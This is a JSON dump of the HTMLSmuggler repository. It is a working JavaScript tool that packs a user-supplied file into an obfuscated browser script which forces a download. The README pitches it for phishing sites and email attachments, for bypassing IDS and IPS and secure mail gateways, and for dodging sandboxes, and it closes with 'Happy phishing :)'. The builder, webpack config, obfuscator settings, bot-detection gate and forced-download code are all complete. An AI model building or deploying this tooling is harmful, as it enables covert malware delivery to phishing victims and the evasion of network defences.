[ { "path": ".babelrc.js", "content": "module.exports = {\n presets: [\n [\n \"@babel/preset-env\",\n {\n useBuiltIns: \"usage\",\n corejs: 3,\n },\n ],\n ],\n};\n" }, { "path": ".browserslistrc", "content": "> 0.5%\nlast 2 versions\nnot dead\nie 10" }, { "path": ".eslintrc.js", "content": "module.exports = {\n env: {\n browser: true,\n es2021: true,\n },\n extends: [\"airbnb-base\", \"prettier\"],\n plugins: [\"simple-import-sort\"],\n overrides: [\n {\n env: {\n node: true,\n },\n files: [\".eslintrc.{js,cjs}\"],\n parserOptions: {\n sourceType: \"script\",\n },\n },\n ],\n parserOptions: {\n ecmaVersion: \"latest\",\n sourceType: \"module\",\n },\n rules: {\n \"import/prefer-default-export\": \"off\",\n \"simple-import-sort/imports\": \"error\",\n \"simple-import-sort/exports\": \"error\",\n },\n ignorePatterns: [\"examples/**/payload.*.js\"],\n globals: {\n CONFIG_COMPRESS: true,\n CONFIG_ANTIBOT: true,\n CONFIG_DELAY: true,\n },\n};\n" }, { "path": ".gitattributes", "content": "examples/**/payload.*.js filter=lfs diff=lfs merge=lfs -text\n" }, { "path": ".gitignore", "content": ".DS_Store\n\nnode_modules/\ndist/\n\n# all payloads\nsrc/assets/*\n!src/assets/.gitkeep\n\n*.log\n" }, { "path": ".prettier.js", "content": "module.exports = {\n printWidth: 80,\n tabWidth: 2,\n useTabs: false,\n semi: true,\n singleQuote: true,\n quoteProps: \"as-needed\",\n trailingComma: \"all\",\n bracketSpacing: true,\n bracketSameLine: false,\n arrowParens: \"always\",\n proseWrap: \"preserve\",\n htmlWhitespaceSensitivity: \"strict\",\n vueIndentScriptAndStyle: true,\n endOfLine: \"lf\",\n};\n" }, { "path": "LICENSE", "content": "MIT License\n\nCopyright (c) 2023 Georgii Gennadev\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n" }, { "path": "README.md", "content": "# HTMLSmuggler ✉️\n\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\n\nHTMLSmuggler - JS payload generator for IDS bypass and payload delivery via HTML smuggling.\n\n## Description\n\nThe full explanation what is HTML Smuggling may be found [here](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/).\n\nThe primary objective of HTML smuggling is to bypass network security controls, such as firewalls and intrusion detection systems, by disguising malicious payloads (e.g. executables/archives/etc.) within seemingly harmless HTML and JavaScript code. By exploiting the dynamic nature of web applications, attackers can deliver malicious content to a user's browser without triggering security alerts or being detected by traditional security mechanisms. Thanks to this technique, the download of a malicious file is not displayed in any way in modern IDS solutions.\n\nThe main goal of HTMLSmuggler tool is creating an independent javascript library with embedded malicious user-defined payload. This library may be integrated into your phishing sites/email html attachments/etc. to deliver embedded payload to the target user system (bypassing IDS and IPS system). An example of created javascript library may be found [here](examples/html/payload.umd.js).\n\n## Features\n\n* Built-in highly configurable JavaScript obfuscator that fully hides your payload makes it impossible to extract your payload from javascript manually.\n* Powerful client-side bots and headless crawlers detection library that doesn't share your payloads with smart secure mail gateways and their friends.\n* Delay before loading to avoid sandboxes that are in a hurry.\n* May be used both as an independent JS library or embedded in JS frameworks such as React, Vue.js, etc.\n* The simplicity of the template allows you to add extra data handlers/compressions/obfuscations.\n* Support a lot of browsers (including old IE10).\n\n## Installation\n\n1. [Install yarn](https://classic.yarnpkg.com/lang/en/docs/install/) package manager.\n2. Install dependencies:\n\n ```bash\n yarn\n ```\n\n3. Read help message.\n\n ```bash\n yarn build -h\n ```\n\n ```text\n Options:\n -p, --payload Path to payload file you want to smuggle\n -n, --name Name of file, that would be downloaded\n -t, --type Contet-Type of downlonaded file (default: \"application/octet-stream\")\n -f, --function Name of exported function (default: \"download\")\n -c, --compress Enable payload compression (gzip)\n -d, --delay Delay before antibot and download in ms (default: 0)\n -a, --antibot Enable bot detection and block them (recommended)\n -h, --help display help for command\n ```\n\n## Usage\n\n### Preparation steps\n\n1. **(Optional)** Modify [javascript-obfuscator options](https://github.com/javascript-obfuscator/javascript-obfuscator#javascript-obfuscator-options) in `obfuscator.js`, my preset is nice, but very slow.\n2. Compile your javascript payload:\n\n > ⚠️ AVOID USAGE OF PAYLOADS BIGGER THAN 3 MiB (see [FAQ](#faq))\n\n ```bash\n yarn build -p /path/to/payload -n file.exe -t \"application/octet-stream\" -c -a -d 3000\n ```\n\n3. Get your payload from `dist/payload.esm.js` or `dist/payload.umd.js`. After that, it may be inserted into your page and called with `download()` (or custom specified with `-f` flag) function.\n\n > `payload.esm.js` is used in `import { download } from 'payload.esm';` imports (ECMAScript standart).\n >\n > `payload.umd.js` is used in html script SRC and `require('payload.umd');` imports (CommonJS, AMD and pure html).\n\n### Pure HTML example\n\nA full example may be found [here](examples/html/).\n\n1. Do [preparation steps](#preparation-steps).\n2. Import created script to html file (or insert it inline):\n\n ```html\n \n \n \n ```\n\n3. Call `download()` function from body:\n\n ```html\n \n \n \n ```\n\n4. Happy phishing :)\n\n### VueJS example\n\nA full example may be found [here](examples/vuejs/).\n\n1. Do [preparation steps](#preparation-steps).\n2. Import created script to vue file:\n\n ```vue\n \n ```\n\n3. Call `download()` function:\n\n ```vue\n \n ```\n\n4. Happy phishing :)\n\n## FAQ\n\n**Q**: I have an error `RangeError: Maximum call stack size exceeded`, how to solve it?\n\n**A**: This [issue described here](https://github.com/javascript-obfuscator/javascript-obfuscator/issues/89). To fix it, try to disable `splitStrings` in `obfuscator.js` or make smaller payload (it's recommended to use up to 2 MB payloads because of this issue).\n\n---\n\n**Q**: Why does my payload build so long?\n\n**A**: The bigger payload you use, the longer it takes to create a JS file. To decrease time of build, try to disable `splitStrings` in `obfuscator.js`. Below is a table with estimated build times using default `obfuscator.js`.\n\n| Payload size | Build time |\n| --- | --- |\n| 525 KB | 53 s |\n| 1.25 MB | 8 m |\n| 3.59 MB | 25 m |\n" }, { "path": "builder.js", "content": "/* eslint-disable no-console */\n/* eslint-disable import/no-extraneous-dependencies */\nconst fs = require(\"fs\");\nconst { program } = require(\"commander\");\nconst webpack = require(\"webpack\");\nconst fflate = require(\"fflate\");\nconst webpackConfig = require(\"./webpack.config\");\n\nprogram\n .requiredOption(\n \"-p, --payload \",\n \"Path to payload file you want to smuggle\"\n )\n .requiredOption(\n \"-n, --name \",\n \"Name of file, that would be downloaded\"\n )\n .option(\n \"-t, --type \",\n \"Contet-Type of downlonaded file\",\n \"application/octet-stream\"\n )\n .option(\"-f, --function \", \"Name of exported function\", \"download\")\n .option(\"-c, --compress\", \"Enable payload compression (gzip)\")\n .option(\"-d, --delay \", \"Delay before antibot and download (ms)\", 0)\n .option(\"-a, --antibot\", \"Enable bot detection and block them (recommended)\");\n\nprogram.parse();\n\nconsole.log(\"Using payload:\", program.opts().payload);\nconsole.log(\"Using filename:\", program.opts().name);\nconsole.log(\"Using Content-Type:\", program.opts().type);\nconsole.log(\"Exported function:\", program.opts().function);\nconsole.log(\"Compression:\", program.opts().compress);\nconsole.log(\"Delay:\", program.opts().delay, \"ms\");\nconsole.log(\"Antibot:\", program.opts().antibot);\n\nconst dst = \"src/assets/payload.bin\";\nfs.readFile(program.opts().payload, { encoding: \"latin1\" }, (err, data) => {\n if (err) throw err;\n\n const aData = fflate.strToU8(data, true);\n const payload = program.opts().compress\n ? fflate.compressSync(aData, { level: 9, mem: 12 })\n : aData;\n console.log(\"Payload size:\", payload.length, \"b\");\n\n fs.writeFile(dst, payload, { flag: \"w+\" }, (err2) => {\n if (err2) throw err2;\n\n const compiler = webpack(\n webpackConfig({\n filetype: program.opts().type,\n filename: program.opts().name,\n funcname: program.opts().function,\n compress: program.opts().compress,\n antibot: program.opts().antibot,\n delay: program.opts().delay,\n })\n );\n compiler.run((err3, stats) => {\n if (err3) throw err3;\n console.log(\n stats.toString({\n colors: true,\n })\n );\n });\n });\n});\n" }, { "path": "examples/html/index.html", "content": "\n\n\n \n \n Some phishy site\n \n\n\n \n\n" }, { "path": "examples/html/payload.umd.js", "content": "version https://git-lfs.github.com/spec/v1\noid sha256:5c9f1b9fc83c374a00fd63c9b353b37b1d587bb41e4064eb9a1aad1d87dbb7b8\nsize 1092062\n" }, { "path": "examples/vuejs/Main.vue", "content": "\n\n\n" }, { "path": "examples/vuejs/payload.esm.js", "content": "version https://git-lfs.github.com/spec/v1\noid sha256:4168d1bf553806cec123e3a7370c595068f3167a7998438242edac2cfc7ae361\nsize 1098951\n" }, { "path": "obfuscator.js", "content": "// Obfuscator doc:\n// https://github.com/javascript-obfuscator/javascript-obfuscator#javascript-obfuscator-options\nmodule.exports = {\n compact: true,\n controlFlowFlattening: true,\n controlFlowFlatteningThreshold: 1,\n deadCodeInjection: true,\n deadCodeInjectionThreshold: 1,\n // NOTE: disable debugProtection for testing in console\n debugProtection: true,\n debugProtectionInterval: 4000,\n disableConsoleOutput: true,\n // NOTE: add domains to work only specified domains\n // e.g. example.com, sub.example.com\n domainLock: [],\n domainLockRedirectUrl: \"about:blank\",\n forceTransformStrings: [],\n identifierNamesCache: null,\n identifierNamesGenerator: \"mangled-shuffled\",\n identifiersDictionary: [],\n identifiersPrefix: \"\",\n ignoreImports: false,\n inputFileName: \"\",\n log: true,\n numbersToExpressions: true,\n renameGlobals: false,\n renameProperties: true,\n renamePropertiesMode: \"safe\",\n // NOTE: dirty fix to make BotD work with obfuscator\n reservedNames: [\"sent\", \"trys\"],\n reservedStrings: [],\n seed: 0,\n selfDefending: true,\n simplify: true,\n sourceMap: false,\n sourceMapBaseUrl: \"\",\n sourceMapFileName: \"\",\n sourceMapMode: \"separate\",\n sourceMapSourcesMode: \"sources-content\",\n // NOTE: disable splitStrings if \"Maximum call stack size exceeded\"\n splitStrings: true,\n splitStringsChunkLength: 35,\n stringArray: true,\n stringArrayCallsTransform: true,\n stringArrayCallsTransformThreshold: 1,\n stringArrayEncoding: [\"base64\", \"rc4\"],\n stringArrayIndexesType: [\"hexadecimal-number\"],\n stringArrayIndexShift: true,\n stringArrayRotate: true,\n stringArrayShuffle: true,\n stringArrayWrappersCount: 6,\n stringArrayWrappersChainedCalls: true,\n stringArrayWrappersParametersMaxCount: 6,\n stringArrayWrappersType: \"function\",\n stringArrayThreshold: 1,\n target: \"browser\",\n transformObjectKeys: true,\n unicodeEscapeSequence: false,\n};\n" }, { "path": "package.json", "content": "{\n \"name\": \"html-smuggler\",\n \"version\": \"1.2.0\",\n \"description\": \"Payload delivery using HTML smuggling\",\n \"private\": true,\n \"repository\": {\n \"url\": \"https://github.com/D00Movenok/HTMLSmuggler\",\n \"type\": \"git\"\n },\n \"author\": \"Georgii Gennadev \",\n \"license\": \"MIT\",\n \"scripts\": {\n \"build\": \"node builder.js\",\n \"lint\": \"eslint . --ext .js --fix --ignore-path .gitignore\"\n },\n \"devDependencies\": {\n \"@babel/core\": \"^7.23.9\",\n \"@babel/preset-env\": \"^7.23.9\",\n \"babel-loader\": \"^9.1.3\",\n \"binary-loader\": \"^0.0.1\",\n \"commander\": \"^11.0.0\",\n \"eslint\": \"^8.46.0\",\n \"eslint-config-airbnb-base\": \"^15.0.0\",\n \"eslint-config-prettier\": \"^8.9.0\",\n \"eslint-plugin-import\": \"^2.28.0\",\n \"eslint-plugin-simple-import-sort\": \"^10.0.0\",\n \"javascript-obfuscator\": \"^4.0.2\",\n \"prettier\": \"^3.0.0\",\n \"string-replace-loader\": \"^3.1.0\",\n \"webpack\": \"^5.88.2\",\n \"webpack-obfuscator\": \"^3.5.1\"\n },\n \"dependencies\": {\n \"@fingerprintjs/botd\": \"^1.9.0\",\n \"core-js\": \"3\",\n \"fflate\": \"^0.8.0\"\n }\n}\n" }, { "path": "src/assets/.gitkeep", "content": "" }, { "path": "src/index.js", "content": "import { decompressSync, strToU8 } from \"fflate\";\n\nimport payload from \"./assets/payload.bin\";\nimport { download, isBot, sleep } from \"./utils\";\n\nasync function main() {\n // sleep before execution\n await sleep(CONFIG_DELAY);\n\n // antibot\n if (CONFIG_ANTIBOT) {\n const ib = await isBot();\n if (ib) {\n console.log(\"Detected bot, exit\");\n return;\n }\n }\n\n // data decompressing and downloading\n console.log(\"Downloading data. Compressed:\", CONFIG_COMPRESS);\n let data = strToU8(payload, true);\n data = CONFIG_COMPRESS ? decompressSync(data) : data;\n download(data, \"dont_change_filename_var\", \"dont_change_content_type_var\");\n}\n\nexport { main as dontChangeFunctionName };\n" }, { "path": "src/utils.js", "content": "import { load } from \"@fingerprintjs/botd\";\n\nfunction download(data, filename, type) {\n const blob = new Blob([data], { type });\n if (window.navigator.msSaveOrOpenBlob) {\n window.navigator.msSaveOrOpenBlob(blob, filename);\n } else {\n const url = URL.createObjectURL(blob);\n const a = document.createElement(\"a\");\n a.style = \"display: none\";\n a.href = url;\n a.download = filename;\n document.body.appendChild(a);\n a.click();\n setTimeout(() => {\n document.body.removeChild(a);\n window.URL.revokeObjectURL(url);\n }, 0);\n }\n}\n\nfunction sleep(ms) {\n return new Promise((resolve) => {\n console.log(\"Sleeping:\", ms, \"ms\");\n setTimeout(resolve, ms);\n });\n}\n\nasync function isBot() {\n let ib = false;\n await load({\n monitoring: false,\n })\n .then((botd) => botd.detect())\n .then((result) => {\n console.log(\"Antibot result:\", result);\n // dirty hack to bypass obfuscator renameProperties\n ib = Object.values(result).some((val) => val === true);\n })\n .catch((error) => {\n console.log(\"Antibot error:\", error);\n });\n return ib;\n}\n\nexport { download, isBot, sleep };\n" }, { "path": "test/test_payload.txt", "content": "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Suspendisse ipsum sapien, pulvinar sed auctor et, ultricies rhoncus mi. Aenean eu lorem vitae massa imperdiet mattis sit amet vel lorem. Fusce eu tortor sem. Fusce dapibus volutpat enim, eget laoreet ex. Nullam nec vehicula mauris. Vestibulum vehicula sapien ut lacus varius varius. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras ultricies dictum sapien, nec tempor est lacinia in.\n\nMorbi sed lobortis est. Donec sodales imperdiet nisl nec lacinia. Donec facilisis, eros ac pellentesque scelerisque, orci ante aliquam felis, vel consequat eros urna tincidunt nulla. Donec consequat tempor nibh vitae egestas. In consectetur nisl et consequat auctor. Phasellus scelerisque lectus in felis bibendum imperdiet. Donec sit amet magna nec nisi malesuada lacinia. Praesent finibus nulla in dui tristique dapibus. Aenean ultricies urna volutpat sem feugiat laoreet. Donec imperdiet tortor at massa ornare finibus. Donec sem odio, convallis ut vehicula interdum, consectetur quis metus.\n\nInteger ut tempus sapien, in porttitor tortor. Etiam eget ligula magna. Sed luctus felis sed magna elementum tincidunt. In eleifend velit at massa iaculis, non tempor lacus iaculis. Ut rutrum tempus nunc, at ullamcorper sapien consequat porttitor. Mauris condimentum tempus consectetur. Donec at tortor nunc.\n\nMorbi condimentum et justo in vestibulum. Donec consectetur nisl quis massa vulputate molestie. Etiam nec ultricies mi. Suspendisse potenti. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia curae; Sed suscipit et felis et malesuada. Nullam ut massa eros. Sed non faucibus lectus. Sed laoreet vel diam id tempor. Donec elementum libero non sodales tincidunt. Nullam maximus elit vel gravida consequat. Mauris eget neque lacinia, lacinia ipsum id, consectetur urna. Phasellus varius urna risus, et volutpat velit ultrices vitae. Interdum et malesuada fames ac ante ipsum primis in faucibus. Curabitur quam odio, hendrerit eu ornare vitae, fringilla vitae ligula.\n\nPhasellus sodales consectetur nisl, eget mollis tellus hendrerit vitae. Quisque quis metus risus. In bibendum facilisis augue ac faucibus. Suspendisse ornare, ante a rutrum viverra, nisi tellus tempor elit, eget bibendum nibh elit non urna. Vivamus nisi nulla, lobortis ac faucibus a, commodo vel purus. Curabitur molestie risus eros, at aliquam mi rutrum id. Fusce non est rhoncus, iaculis quam sed, accumsan erat. Vestibulum eros elit, porttitor quis fringilla vel, volutpat nec dui. Sed nec urna aliquam, blandit sem vel, dapibus nulla. Aliquam commodo consectetur libero sed suscipit. Cras semper pellentesque lorem sed dignissim. Vestibulum lectus purus, mollis eu viverra in, placerat quis dui. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. In dolor felis, commodo sit amet felis sit amet, rhoncus pellentesque mauris" }, { "path": "webpack.config.js", "content": "const path = require(\"path\");\nconst webpack = require(\"webpack\");\nconst WebpackObfuscator = require(\"webpack-obfuscator\");\nconst obfuscatorOptions = require(\"./obfuscator\");\n\nmodule.exports = ({\n filename,\n filetype,\n funcname,\n compress,\n antibot,\n delay,\n}) => {\n const commonConfig = {\n mode: \"production\",\n performance: {\n hints: false,\n maxEntrypointSize: 512000,\n maxAssetSize: 512000,\n },\n entry: \"./src/index.js\",\n module: {\n rules: [\n // NOTE: Defines string names,\n // used because webpack.DefinePlugin globals obfuscation issues.\n {\n test: /\\.m?js$/,\n exclude: /node_modules/,\n use: {\n loader: \"string-replace-loader\",\n options: {\n multiple: [\n { search: \"dont_change_filename_var\", replace: filename },\n { search: \"dont_change_content_type_var\", replace: filetype },\n { search: \"dontChangeFunctionName\", replace: funcname },\n ],\n },\n },\n },\n // NOTE: embed out payload to js\n {\n test: /assets\\/.*/,\n exclude: /node_modules/,\n use: {\n loader: \"binary-loader\",\n },\n },\n // NOTE: support for older browsers\n {\n test: /\\.m?js$/,\n exclude: /node_modules/,\n use: {\n loader: \"babel-loader\",\n },\n },\n // NOTE: heavy obfuscation\n {\n test: /.*/,\n enforce: \"post\",\n // NOTE: excluded core-js because it takes too long to obfuscate\n exclude: /node_modules\\/core-js/,\n use: {\n loader: WebpackObfuscator.loader,\n options: obfuscatorOptions,\n },\n },\n ],\n },\n plugins: [\n // NOTE: Defines boolean globals to change execution flow.\n new webpack.DefinePlugin({\n CONFIG_COMPRESS: JSON.stringify(compress),\n CONFIG_ANTIBOT: JSON.stringify(antibot),\n CONFIG_DELAY: JSON.stringify(delay),\n }),\n ],\n };\n\n return [\n {\n output: {\n path: path.resolve(__dirname, \"dist\"),\n filename: \"payload.umd.js\",\n libraryTarget: \"umd\",\n },\n ...commonConfig,\n },\n {\n output: {\n path: path.resolve(__dirname, \"dist\"),\n filename: \"payload.esm.js\",\n libraryTarget: \"module\",\n },\n experiments: {\n outputModule: true,\n },\n ...commonConfig,\n },\n ];\n};\n" } ]